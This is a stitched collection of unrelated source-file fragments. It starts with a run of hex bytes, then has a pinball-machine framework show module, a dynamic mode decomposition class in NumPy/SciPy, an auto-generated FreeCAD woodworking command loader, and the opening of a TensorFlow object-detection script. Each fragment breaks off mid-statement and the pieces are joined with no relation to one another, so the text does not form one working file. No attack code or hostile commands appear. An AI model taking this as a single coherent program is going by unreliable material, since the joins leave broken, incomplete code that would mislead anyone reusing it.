0x29, 0x57, 0xee, 0xba, 0x39, 0x43, 0x3e, 0x0a, 0xbd, 0xac, 0xb6, 0xa3, 0x10, 0xcf, 0x6a, 0x31,
0x0a, 0xf7, 0xac, 0x06, 0xa3, 0xf0, 0xcb, 0x6a, 0x3f, 0x68, 0x0c, 0x9a, 0x3c, 0x11, 0xe2, 0xfa,
0x88, 0x19, 0x82, 0x65, 0x76, 0x38, 0x47, 0xb1, 0x47, 0x8d, 0x1a, 0x3d, 0x49, 0x9c, 0x0f, 0x04,
0x70, 0x5c, 0xbe, 0x7d, 0xd7, 0x58, 0x14, 0x9e, 0x60, 0xb8, 0x9f, 0xa0, 0x9f, 0x03, 0x3a, 0xe4,
0x27, 0x50, 0x09, 0x7e, 0x90, 0x77, 0x80, 0x0f, 0xa7, 0x21, 0x78, 0x80, 0x10, 0x7e, 0x94, 0x50,
0x56, 0x09, 0x10, 0x42, 0x78, 0x10, 0x46, 0x01, 0x01, 0x00, 0x21, 0xf9, 0x04, | |
<reponame>haggispinball/mpf_fathom_fast
"""Contains show related classes."""
import re
from collections import namedtuple
from typing import List, Dict, Any, Optional
from mpf.core.assets import AssetPool
from mpf.core.config_validator import RuntimeToken
from mpf.core.utility_functions import Util
from mpf.exceptions.config_file_error import ConfigFileError
MYPY = False
if MYPY: # pragma: no cover
from typing import NoReturn # pylint: disable-msg=cyclic-import,unused-import
__api__ = ['Show', 'RunningShow', 'ShowPool']
ShowConfig = namedtuple("ShowConfig", ["name", "priority", "speed", "loops", "sync_ms", "manual_advance", "show_tokens",
"events_when_played", "events_when_stopped", "events_when_looped",
"events_when_paused", "events_when_resumed", "events_when_advanced",
"events_when_stepped_back", "events_when_updated", "events_when_completed"])
class ShowPool(AssetPool):
"""A pool of shows."""
__slots__ = [] # type: List[str]
def __repr__(self):
"""Return str representation."""
return '<ShowPool: {}>'.format(self.name)
# pylint: disable-msg=too-many-arguments
def play_with_config(self, show_config: ShowConfig, start_time=None, start_running=True, start_callback=None,
stop_callback=None, start_step=None) -> "RunningShow":
"""Play asset from pool with config."""
return self.asset.play_with_config(show_config, start_time, start_running, start_callback, stop_callback,
start_step)
# pylint: disable-msg=too-many-arguments
# pylint: disable-msg=too-many-locals
def play(self, priority=0, speed=1.0, start_step=1, callback=None,
loops=-1, sync_ms=None, manual_advance=False, show_tokens=None,
events_when_played=None, events_when_stopped=None,
events_when_looped=None, events_when_paused=None,
events_when_resumed=None, events_when_advanced=None,
events_when_stepped_back=None, events_when_updated=None,
events_when_completed=None, start_time=None, start_callback=None) -> "RunningShow":
"""Play asset from pool."""
return self.asset.play(priority, speed, start_step, callback,
loops, sync_ms, manual_advance, show_tokens,
events_when_played, events_when_stopped,
events_when_looped, events_when_paused,
events_when_resumed, events_when_advanced,
events_when_stepped_back, events_when_updated,
events_when_completed, start_time, start_callback)
# pylint: disable-msg=too-many-instance-attributes
class Show:
"""A show which can be instantiated."""
attribute = 'shows'
path_string = 'shows'
config_section = 'shows'
disk_asset_section = 'file_shows'
extensions = tuple('yaml')
class_priority = 100
pool_config_section = 'show_pools'
asset_group_class = ShowPool
__slots__ = ["_autoplay_settings", "tokens", "token_values", "token_keys", "name", "total_steps", "show_steps",
"_step_cache", "machine"]
def __init__(self, machine, name):
"""Initialise show."""
self.machine = machine
self._autoplay_settings = dict()
self.tokens = set()
self.token_values = dict()
self.token_keys = dict()
self.name = name
self.total_steps = None
self.show_steps = [] # type: List[Dict[str, Any]]
self._step_cache = {}
def __lt__(self, other):
"""Compare two instances."""
return id(self) < id(other)
def _get_duration(self, data, step_num, total_step_time):
total_steps_num = len(data)
step = data[step_num]
if 'duration' not in step:
if step_num == total_steps_num - 1:
# special case with an empty last step (but longer than 1 step)
if 'time' in step and len(step) == 1 and step_num != 0:
return False
return 1
if 'time' in data[step_num + 1]:
next_step_time = data[step_num + 1]['time']
if str(next_step_time)[0] == "+":
return Util.string_to_secs(next_step_time)
if total_step_time < 0: # pragma: no cover
self._show_validation_error("Absolute timing in step {} not possible because "
"there was a duration of -1 before".format(step_num), 5)
return Util.string_to_secs(next_step_time) - total_step_time
return 1
if step_num < total_steps_num - 1 and 'time' in data[step_num + 1]: # pragma: no cover
self._show_validation_error("Found invalid 'time' entry in step after {} which contains a duration. "
"Remove either of them!".format(step_num), 2)
return Util.string_to_secs(step['duration'])
def load(self, data: Optional[Dict]):
"""Load show configuration."""
self.show_steps = list()
if not isinstance(data, list): # pragma: no cover
self._show_validation_error("Show {} does not appear to be a valid show "
"config. It should be a list of steps. Did you forget the hyphen at the start "
"of your step?".format(self.name), 1)
if not data: # pragma: no cover
self._show_validation_error("Cannot load empty show", 6)
total_step_time = 0
# add empty first step if show does not start right away
if 'time' in data[0] and data[0]['time'] != 0:
self.show_steps.append({'duration': Util.string_to_secs(data[0]['time'])})
total_step_time = Util.string_to_secs(data[0]['time'])
# Loop over all steps in the show file
for step_num, step in enumerate(data):
actions = dict()
# Note: all times are stored/calculated in seconds.
# Step time can be specified as either an absolute time elapsed
# (from the beginning of the show) or a relative time (time elapsed
# since the previous step). Time strings starting with a plus sign
# (+) are treated as relative times.
# Step times are all converted to relative times internally (time
# since the previous step).
# Make sure there is a time entry for each step in the show file.
duration = self._get_duration(data, step_num, total_step_time)
# special case: empty last step
if duration is False:
break
if duration == 0: # pragma: no cover
self._show_validation_error("Step {} has 0 duration".format(step_num), 7)
# Calculate the time since previous step
actions['duration'] = duration
if duration > 0 and total_step_time >= 0:
total_step_time += duration
else:
total_step_time = -1
# Now process show step actions
self._process_step_actions(step, actions)
self.show_steps.append(actions)
# Count how many total steps are in the show. We need this later
# so we can know when we're at the end of a show
self.total_steps = len(self.show_steps)
if self.total_steps == 0: # pragma: no cover
self._show_validation_error('Show "{}" is empty', 2)
self._get_tokens()
def _show_validation_error(self, msg, error_code) -> "NoReturn": # pragma: no cover
raise ConfigFileError('"{}" >> {}'.format(self.name, msg), error_code, "show", self.name)
def _process_step_actions(self, step, actions):
if not isinstance(step, dict):
raise AssertionError('Steps in show "{}" need to be dicts.'.format(self.name))
for key, value in step.items():
# key: the section of the show, like 'leds'
# value: dict of express settings or dict of dicts w full settings
# check to see if we know how to process this kind of entry
if key in self.machine.show_controller.show_players.keys():
try:
actions[key] = \
self.machine.show_controller.show_players[key].validate_config_entry(value, self.name)
# If something in the show triggered a config error, bubble it up to preserve logger and context
except ConfigFileError as e:
e.extend('Show "{}"'.format(self.name))
raise e
elif key not in ('duration', 'time'): # pragma: no cover
for player in self.machine.show_controller.show_players.values():
if key == player.config_file_section or key == player.machine_collection_name or \
key + "s" == player.show_section:
self._show_validation_error(
'Invalid section "{}:" found. Did you mean "{}:" instead?'.format(
key, player.show_section), 3)
self._show_validation_error('Invalid section "{}:" found.'.format(key), 4)
def _get_tokens(self):
self._walk_show(self.show_steps)
def _walk_show(self, data, path=None, list_index=None):
# walks a list of dicts, checking tokens
if not path:
path = list()
if isinstance(data, dict):
for k, v in data.items():
self._check_token(path, k, 'key')
self._walk_show(v, path + [k])
elif isinstance(data, list):
for i in data:
self._check_token(path, i, 'key')
if list_index is None:
list_index = 0
else:
list_index += 1
self._walk_show(i, path + [list_index], list_index)
else:
self._check_token(path, data, 'value')
@classmethod
def _copy_recursive(cls, data):
if isinstance(data, dict):
new_dict = dict()
for k, v in data.items():
new_dict[k] = cls._copy_recursive(v)
return new_dict
if isinstance(data, list):
new_list = list()
for i in data:
new_list.append(cls._copy_recursive(i))
return new_list
return data
def get_show_steps(self):
"""Return a copy of the show steps."""
copied_steps = []
for step in self.show_steps:
copied_steps.append(self._copy_recursive(step))
return copied_steps
def _check_token(self, path, data, token_type):
if isinstance(data, RuntimeToken):
self._add_token(data, data.token, path, token_type)
return
if not isinstance(data, str):
return
results = re.findall(r"\(([^)]+)\)", data)
if results:
for result in results:
self._add_token(data, result, path, token_type)
def _add_token(self, placeholder, token, path, token_type):
if token not in self.tokens:
self.tokens.add(token)
if token_type == 'key':
if token not in self.token_keys:
self.token_keys[token] = list()
self.token_keys[token].append(path + [placeholder])
elif token_type == 'value':
if token not in self.token_values:
self.token_values[token] = list()
self.token_values[token].append(path)
# pylint: disable-msg=too-many-arguments
def play_with_config(self, show_config: ShowConfig, start_time=None, start_running=True,
start_callback=None, stop_callback=None, start_step=None) -> "RunningShow":
"""Play this show with config."""
if not start_time:
start_time = self.machine.clock.get_time()
running_show = RunningShow(machine=self.machine,
show=self,
start_time=start_time,
start_step=int(start_step),
start_running=start_running,
callback=stop_callback,
start_callback=start_callback,
show_config=show_config)
return running_show
# pylint: disable-msg=too-many-arguments
# pylint: disable-msg=too-many-locals
def play(self, priority=0, speed=1.0, start_step=1, callback=None,
loops=-1, sync_ms=None, manual_advance=False, show_tokens=None,
events_when_played=None, events_when_stopped=None,
events_when_looped=None, events_when_paused=None,
events_when_resumed=None, events_when_advanced=None,
events_when_stepped_back=None, events_when_updated=None,
events_when_completed=None, start_time=None, start_callback=None,
start_running=True) -> "RunningShow":
"""Play a Show.
There are many parameters you can use here which
affect how the show is played. This includes things like the playback
speed, priority, etc. These are
all set when the show plays. (For example, you could have a Show
file which lights a bunch of lights sequentially in a circle pattern,
but you can have that circle "spin" as fast as you want depending on
how you play the show.)
Args:
----
priority: Integer value of the relative priority of this show. If
there's ever a situation where multiple shows want to control
the same item, the one with the higher priority will win.
("Higher" means a bigger number, so a show with priority 2 will
override a priority 1.)
speed: Float of how fast your show runs. Your Show files
specify step times in actual time values. When you play a
show,
you specify a playback rate factor that is applied to the time
values in the show (divides the relative show times). The
default value is 1.0 (uses the actual time | |
<reponame>dowlinglab/dmd-energy-markets
import numpy as np
from scipy import linalg as la
from cmath import exp
import matplotlib.pyplot as plt
def split(Xf, verbose=False):
'''
This function will perform a crutical manipulation for DMD
which is the splitting of a spacial-temporal matrix (Xf) into
two matrices (X and Xp). The X matrix is the time series for
1 to n-1 and Xp is the time series of 2 to n where n is the
number of time intervals (columns of the original Xf).
input:
Xf - matrix of full spacial-temporal data
output:
X - matrix for times 1 to n-1
Xp - matrix for times 2 to n
options:
verbose - boolean for visualization of splitting
'''
if verbose:
print('Entering the matrix splitting function:')
if verbose:
print('Xf =\n', Xf, '\n')
X = Xf[:, :-1]
Xp = Xf[:, 1:]
if verbose:
print('X =\n', X, '\n')
print('Xp =\n', Xp, '\n')
return X, Xp
class DMD:
'''
This class contains the functions needed for performing a full DMD
on any given matrix. Depending on functions being used, different
outputs can be achieved.
This class also contains functions useful to the analysis of DMD
results and intermediates.
'''
@staticmethod
def decomp(Xf, time, verbose=False, rank_cut=True, esp=1e-2, svd_cut=False,
num_svd=1, do_SVD=True, given_svd=False):
'''
This function performs the basic DMD on a given matrix A.
The general outline of the algorithm is as follows...
1) Break up the input X matrix into time series for 1 to n-1 (X)
and 2 to n (X) where n is the number of time intervals (X_p)
(columns). This uses the manipulate class's function "split".
2) Compute the Singular Value Decomposition of X. X = (U)(S)(Vh)
3) Compute the A_t matrix. This is related to the A matrix which
gives A = X * Xp. However, the At matrix has been projected
onto the POD modes of X. Therefore At = U'*A*U. (' detonates
a matrix transpose)
4) Compute the eigen decomposition of the At matrix. At*W=W*L
5) Compute the DMD modes of A by SVD reconstruction. Finally, the
DMD modes are given by the columns of Phi.
Phi = (Xp)(V)(S^-1)(W)
6) Compute the discrete and continuous time eigenvalues
lam (discrete) is the diagonal matrix of eigenvalues of At.
omg (continuous) = ln(lam)/dt
7) Compute the amplitude of each DMD mode (b). This is a vector
which applies to this system: Phi(b)=X_1 Where X_1 is the first
column of the input vector X. This requires a linear equation
solver via scipy.
8) Reconstruct the matrix X from the DMD modes (Xdmd).
inputs:
* X - (mxn) Spacial Temporal Matrix
* time - (nx1) Time vector
outputs:
1. Phi - DMD modes
2. omg - discrete time eigenvalues
3. lam - continuous time eigenvalues
4. b - amplitudes of DMD modes
5. Xdmd - reconstructed X matrix from DMD modes
6. rank - the rank used in calculations
** all contained in a class see ### (10) ### below **
options:
* verbose - boolean for more information
* svd_cut - boolean for truncation of SVD values of X
* esp - value to truncate singular values lower than
* rank_cut - truncate the SVD of X to the rank of X
* num_svd - number of singular values to use
* do_SVD - tells the program if the svd is provided to it or not
'''
if verbose:
print('Entering Dynamic Mode Decomposition:\n')
# --- (1) --- #
# split the Xf matrix
X, Xp = split(Xf)
if verbose:
print('X = \n', X, '\n')
print('X` = \n', Xp, '\n')
### (2) ### # noqa:
# perform a singular value decompostion on X
if do_SVD:
if verbose:
'Performing singular value decomposition...\n'
U, S, Vh = la.svd(X)
else:
if verbose:
'Singular value decompostion provided...\n'
U, S, Vh = given_svd
if verbose:
print('Singular value decomposition:')
print('U: \n', U)
print('S: \n', S)
print('Vh: \n', Vh)
print('Reconstruction:')
S_m = np.zeros(np.shape(X))
for i in range(len(list(S))):
S_m[i, i] = S[i]
recon = np.dot(np.dot(U, S_m), Vh)
print('X =\n', recon)
# perform desired truncations of X
if svd_cut:
rank_cut = False
if rank_cut: # this is the default truncation
rank = 0
for i in S:
if i > esp:
rank += 1
if verbose:
print('Singular Values of X:', '\n', S, '\n')
print('Reducing Rank of System...\n')
Ur = U[:, 0:rank]
Sr = S[0:rank]
Vhr = Vh[0:rank, :]
if verbose:
recon = np.dot(np.dot(Ur, np.diag(Sr)), Vhr)
print('Rank Reduced reconstruction:\n', 'X =\n', recon)
elif svd_cut:
rank = num_svd
if verbose:
print('Singular Values of X:', '\n', S, '\n')
print('Reducing Rank of System to n =', num_svd, '...\n')
Ur = U[:, 0:rank]
Sr = S[0:rank]
Vhr = Vh[0:rank, :]
if verbose:
recon = np.dot(np.dot(Ur, np.diag(Sr)), Vhr)
print('Rank Reduced reconstruction:\n', 'X =\n', recon)
# return the condition number to view singularity
condition = max(Sr) / min(Sr)
smallest_svd = min(Sr)
svd_used = np.size(Sr)
if verbose:
condition = max(Sr) / min(Sr)
print('Condition of Rank Converted Matrix X:', '\nK =', condition, '\n')
# make the singular values a matrix and take the inverse
Sr_inv = np.diag([i ** -1 for i in Sr])
Sr = np.diag(Sr)
### (3) ### # noqa:
# now compute the A_t matrix
Vr = Vhr.conj().T
At = Ur.conj().T.dot(Xp)
At = At.dot(Vr)
At = At.dot(la.inv(Sr))
if verbose:
print('A~ = \n', At, '\n')
### (4) ### # noqa:
# perform the eigen decomposition of At
L, W = la.eig(At)
# also determine the number of positive eigenvalues
pos_eigs = np.count_nonzero((L > 0))
### (5) ### # noqa:
# compute the DMD modes
# phi = Xp @ Vhr.conj().T @ Sr_inv @ W
phi = np.dot(Xp, Vhr.conj().T)
phi = np.dot(phi, Sr_inv)
phi = np.dot(phi, W)
if verbose:
print('DMD Mode Matrix:', '\nPhi =\n', phi, '\n')
### (6) ### # noqa:
# compute the continuous and discrete eigenvalues
dt = time[1] - time[0]
lam = L
omg = np.log(lam) / dt
if verbose:
print('Discrete time eigenvalues:\n', 'Lambda =', L, '\n')
print('Continuous time eigenvalues:\n', 'Omega =', np.log(L) / dt, '\n')
print('Number of positive eigenvalues: ', pos_eigs, '\n')
### (7) ### # noqa:
# compute the amplitude vector b by solving the linear system described.
# note that a least squares solver has to be used in order to approximate
# the solution to the overdefined problem
x1 = X[:, 0]
b = la.lstsq(phi, x1)
b = b[0]
if verbose:
print('b =\n', b, '\n')
### (8) ### # noqa:
# finally reconstruct the data matrix from the DMD modes
length = np.size(time) # number of time measurements
# initialize the time dynamics
dynamics = np.zeros((rank, length), dtype=np.complex_)
for t in range(length):
omg_p = np.array([exp(i * time[t]) for i in omg])
dynamics[:, t] = b * omg_p
if verbose:
print('Time dynamics:\n', dynamics, '\n')
# reconstruct the data
Xdmd = np.dot(phi, dynamics)
if verbose:
print('Reconstruction:\n', np.real(Xdmd), '\n')
print('Original:\n', np.real(Xf), '\n')
### (9) ### # noqa:
# calculate some residual value
res = np.real(Xf - Xdmd)
error = la.norm(res) / la.norm(Xf)
if verbose:
print('Reconstruction Error:', round(error * 100, 2), '%')
### (10) ### # noqa:
# returns a class with all of the results
class results():
def __init__(self):
self.phi = phi
self.omg = omg
self.lam = lam
self.b = b
self.Xdmd = Xdmd
self.error = error * 100
self.rank = rank
self.svd_used = svd_used
self.condition = condition
self.smallest_svd = smallest_svd
self.pos_eigs = pos_eigs
self.dynamics = dynamics
self.svd_used = svd_used
return results()
@staticmethod
def predict(dmd_model, t):
'''
This function will take a DMD decomposition output
result and a desired time incremint prediction and
produce a prediction of the system at the given time.
inputs:
* dmd_model - class that comes from the function "decomp"
* t - future time for prediction
outputs:
* x - prediction vector (real part only)
'''
# finally reconstruct the data matrix from the DMD modes
dynamics = np.zeros((dmd_model.rank, 1), dtype=np.complex_)
omg_p = np.array([exp(i * t) for i in dmd_model.omg])
dynamics | |
<reponame>dprojects/Woodworking
# This file has been automatically generated by the loadToolsAuto.py script. Don't change it here.
import FreeCADGui
import os, sys
import fakemodule
path = os.path.dirname(fakemodule.__file__)
iconPath = os.path.join(path, "Icons")
# ######################################################################################################################
class getDimensions():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "getDimensions.xpm"),
"Accel" : "",
"MenuText": "getDimensions, BOM, cutlist",
"ToolTip" : "Creates spreadsheet with dimensions to cut."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "getDimensions"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("getDimensions", getDimensions())
# ######################################################################################################################
class sheet2export():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "sheet2export.xpm"),
"Accel" : "",
"MenuText": "sheet2export",
"ToolTip" : "Exports spreadsheet to chosen file format."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "sheet2export"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("sheet2export", sheet2export())
# ######################################################################################################################
class scanObjects():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "scanObjects.xpm"),
"Accel" : "",
"MenuText": "scanObjects",
"ToolTip" : "Inspection tool for FreeCAD macro development & project debug (live API)."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "scanObjects"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("scanObjects", scanObjects())
# ######################################################################################################################
class setTextures():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "setTextures.xpm"),
"Accel" : "",
"MenuText": "setTextures",
"ToolTip" : "Store textures information at object's property and allows to load textures from stored URL. Solves problem with texture sharing, no huge project file size."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "setTextures"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("setTextures", setTextures())
# ######################################################################################################################
class debugInfo():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "debugInfo.xpm"),
"Accel" : "",
"MenuText": "debugInfo",
"ToolTip" : "Copy platform details to clipboard for bug report purposes."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "debugInfo"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("debugInfo", debugInfo())
# ######################################################################################################################
class makeTransparent():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "makeTransparent.xpm"),
"Accel" : "",
"MenuText": "transparent or normal mode",
"ToolTip" : "Make all parts transparent, so you can see all the joints, pilot holes, screws, countersinks. If you click next one all parts will back to normal. The transparent default is 83, so do not set any part to this number if you want e.g. to keep glass part of the furniture transparent after this preview."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "makeTransparent"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("makeTransparent", makeTransparent())
# ######################################################################################################################
class colorManager():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "colorManager.xpm"),
"Accel" : "",
"MenuText": "colorManager",
"ToolTip" : "Allows to set face colors for all objects from spreadsheet. Also you can browse colors for manually selected face, object or many faces or objects and see the effect at 3D model in real-time."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "colorManager"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("colorManager", colorManager())
# ######################################################################################################################
class fitModel():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "fitModel.xpm"),
"Accel" : "",
"MenuText": "fitModel",
"ToolTip" : "Fit 3D model to the screen and set base orientation (XY, 0 key)."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "fitModel"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("fitModel", fitModel())
# ######################################################################################################################
class magicManager():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "magicManager.xpm"),
"Accel" : "",
"MenuText": "magicManager",
"ToolTip" : "If you have problem with unexpected result of Magic Panels, you can use this tool to preview panel before creation. It may take more time to create panel, but you can select exact panel to apply, also the edge and vertex position. This tool allows to create panel at selected face or between two faces."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "magicManager"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("magicManager", magicManager())
# ######################################################################################################################
class panelDefaultXY():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultXY.xpm"),
"Accel" : "",
"MenuText": "panel, XY, 600x300, 18 thickness",
"ToolTip" : "Create default panel with dimensions 600 mm x 300 mm and 18 mm thickness in the XY direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultXY"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultXY", panelDefaultXY())
# ######################################################################################################################
class panelDefaultYX():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultYX.xpm"),
"Accel" : "",
"MenuText": "panel, YX, 300x600, 18 thickness",
"ToolTip" : "Create default panel with dimensions 300 mm x 600 mm and 18 mm thickness in the YX direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultYX"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultYX", panelDefaultYX())
# ######################################################################################################################
class panelDefaultXZ():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultXZ.xpm"),
"Accel" : "",
"MenuText": "panel, XZ, 600x300, 18 thickness",
"ToolTip" : "Create default panel with dimensions 600 mm x 300 mm and 18 mm thickness in the XZ direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultXZ"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultXZ", panelDefaultXZ())
# ######################################################################################################################
class panelDefaultZX():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultZX.xpm"),
"Accel" : "",
"MenuText": "panel, ZX, 300x600, 18 thickness",
"ToolTip" : "Create default panel with dimensions 300 mm x 600 mm and 18 mm thickness in the ZX direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultZX"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultZX", panelDefaultZX())
# ######################################################################################################################
class panelDefaultYZ():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultYZ.xpm"),
"Accel" : "",
"MenuText": "panel, YZ, 600x300, 18 thickness",
"ToolTip" : "Create default panel with dimensions 600 mm x 300 mm and 18 mm thickness in the YZ direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultYZ"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultYZ", panelDefaultYZ())
# ######################################################################################################################
class panelDefaultZY():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelDefaultZY.xpm"),
"Accel" : "",
"MenuText": "panel, ZY, 300x600, 18 thickness",
"ToolTip" : "Create default panel with dimensions 300 mm x 600 mm and 18 mm thickness in the ZY direction, described by the icon. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelDefaultZY"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelDefaultZY", panelDefaultZY())
# ######################################################################################################################
class panelCopyXY():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelCopyXY.xpm"),
"Accel" : "",
"MenuText": "copy panel to XY",
"ToolTip" : "Copy selected panel to XY direction, described by the icon. If you select any supported panel in other direction, e.g. XZ, this will be some kind of copy panel with exact rotation. Change dimensions and placement at object property window, if needed."}
def Activated(self):
import os, sys
import fakemodule
modulePath = sys.path
module = "panelCopyXY"
path = os.path.dirname(fakemodule.__file__)
path = os.path.join(path, "Tools")
path = os.path.join(path, "MagicPanels")
sys.path.append(path)
if module in sys.modules:
del sys.modules[module]
__import__(module, globals(), locals(), [], 0)
sys.path = modulePath
return
def IsActive(self):
# not needed now, maybe in the future
return True
FreeCADGui.addCommand("panelCopyXY", panelCopyXY())
# ######################################################################################################################
class panelCopyYX():
def GetResources(self):
return {"Pixmap" : os.path.join(iconPath, "panelCopyYX.xpm"),
"Accel" : "",
"MenuText": "copy panel to YX",
"ToolTip" : "Copy selected panel to YX direction, described by the icon. If you select any supported panel in other direction, e.g. XZ, this will be some kind of copy panel with exact rotation. Change dimensions and | |
<reponame>makquel/object_detection_BGE<gh_stars>1-10
# Object detection using CNN based classifier versão 1.0
#
# -----------------------------------
# Author: <NAME>
# Date: 10/04/19
# Description: Este script utiliza um classificador treinado em tensorflow para detectar marcadores do tipo ASARP
# utéis na detecção de movimento muscular durante a cirugia do Pena. Dada a instabilidade na detecção, o classificador possui
# um estimador probabilistico usando filtro de Kalman.
# Import packages
import os
import cv2
import numpy as np
import tensorflow as tf
import sys
import time
import math
from scipy import linalg
# This is needed since the notebook is stored in the object_detection folder.
sys.path.append("..")
# Import utilites
from utils import label_map_util
from utils import visualization_utils as vis_util
import csv
# Name of the directory containing the object detection module we're using
MODEL_NAME = 'inference_graph'
# VIDEO_NAME = 'test.mov'
VIDEO_NAME = 'bge_teste.avi'
# Grab path to current working directory
CWD_PATH = os.getcwd()
# Path to frozen detection graph .pb file, which contains the model that is used
# for object detection.
PATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,'frozen_inference_graph.pb')
# Path to label map file
PATH_TO_LABELS = os.path.join(CWD_PATH,'training','label_map.pbtxt')
# Path to video
